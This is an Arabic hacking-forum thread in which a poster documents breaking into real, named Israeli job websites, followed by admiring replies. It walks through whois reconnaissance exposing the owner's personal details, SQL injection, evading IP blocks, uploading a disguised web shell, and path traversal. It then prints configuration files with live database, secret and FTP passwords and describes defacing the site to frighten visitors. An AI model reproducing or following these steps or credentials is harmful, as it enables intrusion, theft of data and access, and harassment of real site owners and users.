التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 12-13-2012, 03:45 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

6 للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


موضوعي التاني بعد الغياب الطويل

خلينا نبلش ونقول

السلام عليكم وكيف الأحوال
بالموضوع السابق ذكرت سبب الغياب

وخلينا بالموضوع

الموضوع مهم ركز معي

ومن العنوان واضح شو الموضوع

يله نبلش عبركت الله



اولا نبدا بالدخول الى موقع who.is مثلا لجمع المعلومات






كود PHP:
query:        smartjob.co.il 

reg
-****:     smartjob 
domain
:       smartjob.co.il 

descr
:        Shachar Bialick 
descr
:        Haetzel St.12 
descr
:        Ariel 
descr
:        44837 
descr
:        Israel 
phone
:        +972 3 5103051 
fax
-no:       +972 3 7250210 
e
-mail:       Shachar AT Techlocks.com 
admin
-c:      LD-SB11242-IL 
tech
-c:       LD-SB11242-IL 
zone
-c:       LD-SB11242-IL 
nserver
:      ns1.virtualbox.co.il 
nserver
:      ns2.virtualbox.co.il 
validity
:     20-07-2014 
status
:       Transfer Locked 
changed
:      domain-registrar AT isoc.org.il 20100720 (Assigned
changed:      domain-registrar AT isoc.org.il 20101003 (Changed
changed:      domain-registrar AT isoc.org.il 20110726 (Changed
changed:      domain-registrar AT isoc.org.il 20110726 (Changed

person:       Shachar Bialick 
address
:      Haetzel St.12 
address
:      Ariel 
address
:      44837 
address
:      Israel 
phone
:        +972 52 8000004 
fax
-no:       +972 3 7624553 
e
-mail:       shachar AT internrate.co.il 
nic
-hdl:      LD-SB11242-IL 
changed
:      Managing Registrar 20070509 
changed
:      Managing Registrar 20101003 

registrar 
****: LiveDns Ltd 
registrar info
http://domains.livedns.co.il 

Rights to the data above are restricted by copyrigh 

نسحب الايبي و نروح على Bing








الموقع سكربت خاص ..... نجرب نتفحص الموقع و نبحث عن متفيرات لعل نحقنها او نبحث عن ثغرات النكلود مثلا



كود PHP:
http://www.smartjob.co.il/content.php?id=2 

www.smartjob.co.il/search.php?pos_type_side_search=


نضعهم في الهافينج




ملاحضة = معظم السكربتات الخاصة مصابة



كود PHP:
License is valid 
Analyzing http
://www.smartjob.co.il/search.php?pos_type_side_search=3 
Host IP62.219.17.248 
*** ServerMicrosoft-IIS/7.5 
Powered
-byPHP/5.2.17 
Powered
-byASP.NET 

يا سلام تم الحقن و استخرجنا معلومات الادمينز .








تعالو نبحث عن لوحة التحكم ...



نبحث عن اللوحة نلاقي مكانين

الاول



كود PHP:
https://www.smartjob.co.il/login.php 
نجرب ندخل بيه الى احد الباسوردات ... يرفض الدخول

نشوف الثانية


كود PHP:
http://www.smartjob.co.il/admin/ 











اووبس

ماني فهمان ولا اي شي ........ هي لوحة تحكم جوملا لما يكون الموقع مسكر مثلا .


نجرب


كود PHP:
 http://www.smartjob.co.il/admin/administrator 









نجرب ندخل بالبيانات المسحوبة من قبل .... لم ننجح البيانات خاطئة


طيب فين لوحة التحكم ؟ ما فيه ؟ يعني شغلنا كله طار

ااااه كم هي صعبم المواقع الخاصة .....


استنى بقى ... في الموقع فيه مكان للتسجل .... ليه ما نسجل و ندخل

لان التسجيل ياخذك لمنطقة خاصة نوعاا ما ... ممكن فيها ثغرة ... او لوحة

بعد التسجيل احنا في اللوحة الخاصة بالمسجلين ..... بس استنى هو شو في ؟








الدنيا ملخبطة ؟ ؟؟ ...... انا على موقع ثاني مو الموقع الاول ؟ ؟؟



كود PHP:
https://www.smarteq.co.il/he-il/applicants/7647966b59/status 
انا على ال job و شو جاب teq §§§


اقولكم ..... لما تكون مواقع خاصة ... فانه احتمال كبير ان يستخدمون نفس القاعدة البيانات ... لهذا لما حقنا السكربت الاول smartjob سحبنا معلومات من قاعدة السربت الثاني

smartteq ...لانه ببساطة نفس قاعدة البيانات

و هنا حلينا مشكلة بعض الشباب انه يحقن موقع و مايلقى اللوحة << برايفت و ماتغلى عليكم .



طيب الان بديهي انه اللوحة راح تكون في موقع smarteq.co.il












نفحص الموقع ببرنامج acuntix







و نطلع اللوحة ..... بس استنى

الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟

نفحص بالبرنامج نفسه بس مع بعض الشروط

الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو و نطلع اللوحة ..... بس استنى

الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟

نفحص بالبرنامج نفسه بس مع بعض الشروط

الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو










شايفين في الصورة في اليمين اعلى .... نجد pause و resume ... ههه يعني

كلما يعطينا بلوك نروح للبرنامج و نعمل pause و نروح لل Vpn و نغير اليبي ثم نعود للبرنامج و نعمل resume

و نكمل الفحص حتى نجد اللوحة هذه



كود PHP:
https://www.smarteq.co.il/he-il/site/adminlogin?login=true 









نجرب ندخل بالبيانات اللي سحبناها فوق بال الهافينج ..... و النتيجة مبرررررررررروك اللوحة










بس فيه مشكلة شباب ... هو اللغة هي حدي فهمها ؟

هههه حاليا ما لازم نفهمها .. طريقة بسيطة نفس اللي في الصورة











نممر سهم الفارة و نقرا المسار او اللينك .... و نفهم معناه

و نجرب هنا



كود PHP:
https://www.smarteq.co.il/he-il/admin/settings/account 










ياسلام ... نجرب نرفع شل مشفر ...... مشان ما يمسكوه الانتي فيروس



application/octet-streamno good


بفففففف ... ماينفعش نرفع ملف php

استنى بقى .... نجرب tamper data



نحول صيغة الشل على جهازي من a.php الى a.jpg

ثم








يا سلام تم الرفع

بس مسار الشل وين ؟؟؟


نجرب نشوف سورس الصفحة

جمييييييييييييييييييل جدااا ... هذا مسار الشل













كود PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=6002_a.php&p=26&core=true 
ندخل من المنتصفح بففففففففففففففف ... الشل ما شتغل

شو نعمل يا جماعه ؟؟؟

استنى لحظه هو ملف thumbnail.php هو اللي في الرابط ... و يحاول يفتح لنا الشل على انه صورة .... لذلك هدا الخطا

طيب الملفات اترفعت وين ؟

لاحض الرابط فوق و الموقع .... احتمال ثغرة انكلود

نجرب هيك


كود PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=../../ 


ضهر خطا

جميييل



كود PHP:
 ../../_uploads/images/../ 

يعني من مجلد classes نرجع مجلدين ... و نصبح في lib و منه نجد مجلدي uploads و images يعني الشل يكون هنا ..



كود PHP:
 https://www.smarteq.co.il/lib/_uploads/images/6002_a.php 











نجرب .... ياااااااااااااااااااااااااااااسلام ... هذا الشل


*****************************

الان رفعنا الشل ... طيب شو نعمل ؟ ممكن نثبت انفسنا على السيرفر جيداا
او نبحث عن ملفات حساسة

اول الملفات هي ملفات الكونفيغات

و انا اريد قراءة كونفيغ جوملا اللي لقيناه من قيبل

نجرب نبحث من الشل .... انا صراحة ضعيف جدا في سرفرات الوندوز

بس فيه طريقتي الفاشلة هذه

لا حظو المسارهنا

كود PHP:
c:DomainsShaharBsmarteq.co.ilwwwrootlib_uploads 
يعني من المفروض مسار الكونفيغ يكون


كود PHP:
c:DomainsShaharBsmartjob.co.ilwwwrootadminconfiguration.php 
و هذا الكونفيغ


كود PHP:
 <?php 
class JConfig 
    public 
$offline '1'
    public 
$offline_message =  
    public 
$site**** = 'SmartJOB'
    public 
$editor 'tinymce'
    public 
$list_limit '20'
    public 
$access '1'
    public 
$debug '0'
    public 
$debug_lang '0'
    public 
$dbtype 'mysql'
    public 
$host 'localhost'
    public 
$user 'getsmar_cv123'
    public 
$password 'H5p60v9OfT9n'
    public 
$db 'getsmar_smartjob'
    public 
$dbprefix 'jos_'
    public 
$live_site ''
    public 
$secret '1phLFwWlgWcTugFj'
    public 
$gzip '0'
    public 
$error_reporting '-1'
    public 
$helpurl 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}'
    public 
$ftp_host '127.0.0.1'
    public 
$ftp_port '21'
    public 
$ftp_user ''
    public 
$ftp_pass ''
    public 
$ftp_root ''
    public 
$ftp_enable '0'
    public 
$offset 'UTC'
    public 
$offset_user 'UTC'
    public 
$mailer 'mail'
    public 
$mailfrom 'admin@smartjob.co.il'
    public 
$from**** = 'SmartJOB'
    public 
$sendmail '/usr/sbin/sendmail'
    public 
$smtpauth '0'
    public 
$smtpuser '×،×™×،×‍×گ'
    public 
$smtppass '****l100'
    public 
$smtphost 'localhost'
    public 
$smtpsecure 'none'
    public 
$smtpport '25'
    public 
$caching '0'
    public 
$cache_handler 'file'
    public 
$cachetime '15'
    public $****
Desc ''
    public $****
Keys ''
    public $****
Title '1'
    public $****
Author '1'
    public 
$sef '1'
    public 
$sef_rewrite '0'
    public 
$sef_suffix '0'
    public 
$unicodeslugs '0'
    public 
$feed_limit '10'
    public 
$log_path 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\logs'
    public 
$tmp_path 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\tmp'
    public 
$lifetime '15'
    public 
$session_handler 'database'
    public $****
Rights ''
    public 
$site****_pagetitles '0'
    public 
$force_ssl '0'
    public 
$feed_email 'author'
    public $******
_domain ''
    public $******
_path ''
}



طبعاا شباب دام انها تقريبا قاعدة واحدة ..... يعني اي معلومة راح تكون حساسة جدااااااااااا
و منها

هذا كونيغ ثاني لقيته

كود PHP:
C:DomainsShaharBsmartjob.co.ilwwwrootconfiguration.php 

فيه التالي



كود PHP:
 public $ftp_host '62.219.17.236'
    public 
$ftp_port '21'
    public 
$ftp_user 'OrZilca'
    public 
$ftp_pass 'WorkHard50'
    public 
$ftp_root 'smartjob.co.il/wwwroot/'
    public 
$ftp_enable '1'



نجرب ندخل ftp

و النتيجة full access على جميع مواقعه











طيب الان الاندكس ..... كلام و صور .... و بعد شوي صاحب الموقع يعدله و خلص

جميلة صح ؟

لا


نهاجم الموقع + نهاجم الزوار ...... نرعبهم ههههههههههه

فيه فلاش بنت كانها شبح وتبلش بالصراخ ..... صراحة انا اعلق في الاندكس و لا اشغله من الرعب ههههههههه

عشان تصبح remote kill index ههههههههههههههههههههههه






نشالله كون توفقت بالشرح


وشكرا لا تنسونا من الدعاء


وفك اسر المعتقلين في سوريا


وتحسين الحال


امين يا الله





ggukh;f :hsji`ht hgsdvtvhj hgohwm , jo'd hgplhdm hg]us hgj'fdr ugn

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 12-13-2012, 04:23 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
GHOST HACKERS
:: مُدِيْر عـــام ( قائد فريق الفحص وكشف التلغيم ) ::
 
الصورة الرمزية GHOST HACKERS
 

 

 
إحصائية العضو






GHOST HACKERS غير متواجد حالياً

إرسال رسالة عبر Skype إلى GHOST HACKERS

 

 

إحصائية الترشيح

عدد النقاط : 102
GHOST HACKERS will become famous soon enoughGHOST HACKERS will become famous soon enough

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


بارك الله فيك
التوقيع






هــــــــــــــــام

الأبلاغ عن موضوع ملغم

هنـــــــــــــــــــــــــــــــــــا
يوجد موضوع او شاكك بموضوع يرسل برسائل خاصه عند
الأخ
GHOST HACKERS

هام :
يمنع منعاً باتاً

رفع الملفات على المواقع التالية:

Ge.tt - mediafire.com - 4shared.com
اذا تم انزال موضوع في الرفع الذي ذكرى سابقا يحذف الموضوع ..نهائيا




 

   

رد مع اقتباس
قديم 12-13-2012, 05:06 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية GAZA-HacK
 

 

 
إحصائية العضو





GAZA-HacK غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
GAZA-HacK is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il



مٱشّٱء ٱللۂ شّرحً رٱئع وِمفُيّدُ وِمعلوِمٱتُ تُفُيّدُ ٱلمحًتُرفُ قَبّل ٱلمبّتُدُى ٱلى ٱلٱمٱم





   

رد مع اقتباس
قديم 12-13-2012, 05:12 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


شكرا على الردود

وافتخر بردك اخي غزه هكر

ووسام على صدري ردك اخي جوست هكر

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 12-14-2012, 12:25 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


ماشاء الله شرح جميل ومنسق مثل صاحبه
باراك الله فيك اخي
موفق باذن الله

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 12-14-2012, 02:23 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


aircrack -ng شكرا اخي الكريم

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
قديم 12-22-2012, 03:27 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Reko11
 

 

 
إحصائية العضو






Reko11 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Reko11 is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


اخى الغالى ابى منك اندكسك المرعب هذا ههههههههههههه

   

رد مع اقتباس
قديم 12-22-2012, 05:03 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
Dr.Bat
$ Spam King ~
 
الصورة الرمزية Dr.Bat
 

 

 
إحصائية العضو






Dr.Bat غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.Bat is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


شرح روعة من شخص اروع واصل أخوي

التوقيع

R.H@hotmail.com

للتواصل مو ......

 

   

رد مع اقتباس
قديم 12-22-2012, 05:41 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو






x-LanS-HaCker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
x-LanS-HaCker is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


شكرا لك حبيب قلبي
بارك الله فيك

التوقيع

http://www.shbab2.com/vb/photos/1/sh...915378_375.png

تَحتَوِيني حِكمَة الشَخصْ الحَكِيمْ
كُن بَيِنَة والأدَبْ حُبٌ وغَرَآم

 

   

رد مع اقتباس
قديم 12-23-2012, 02:16 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية despond
 

 

 
إحصائية العضو







despond غير متواجد حالياً

إرسال رسالة عبر MSN إلى despond

 

 

إحصائية الترشيح

عدد النقاط : 10
despond is on a distinguished road

افتراضي رد: للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il


مشكور على الر\و\ الجميله

التوقيع

لا تحوال التلغيم فأن لغمت سوف يتم دعسك ونسيانك مع التاريخ
:love: شبكةالعناكب الأحترافية :love:
للتواصل + تبادل الخبرات + التعليم
كود:
sy7@live.de

الحمد لله على اني مسلم ولو لم اكن مسلم لأسلمت وقلت
لا اله الا الله وحده لا شريك له واشهد ان محمد عبده ورسوله

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:09 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0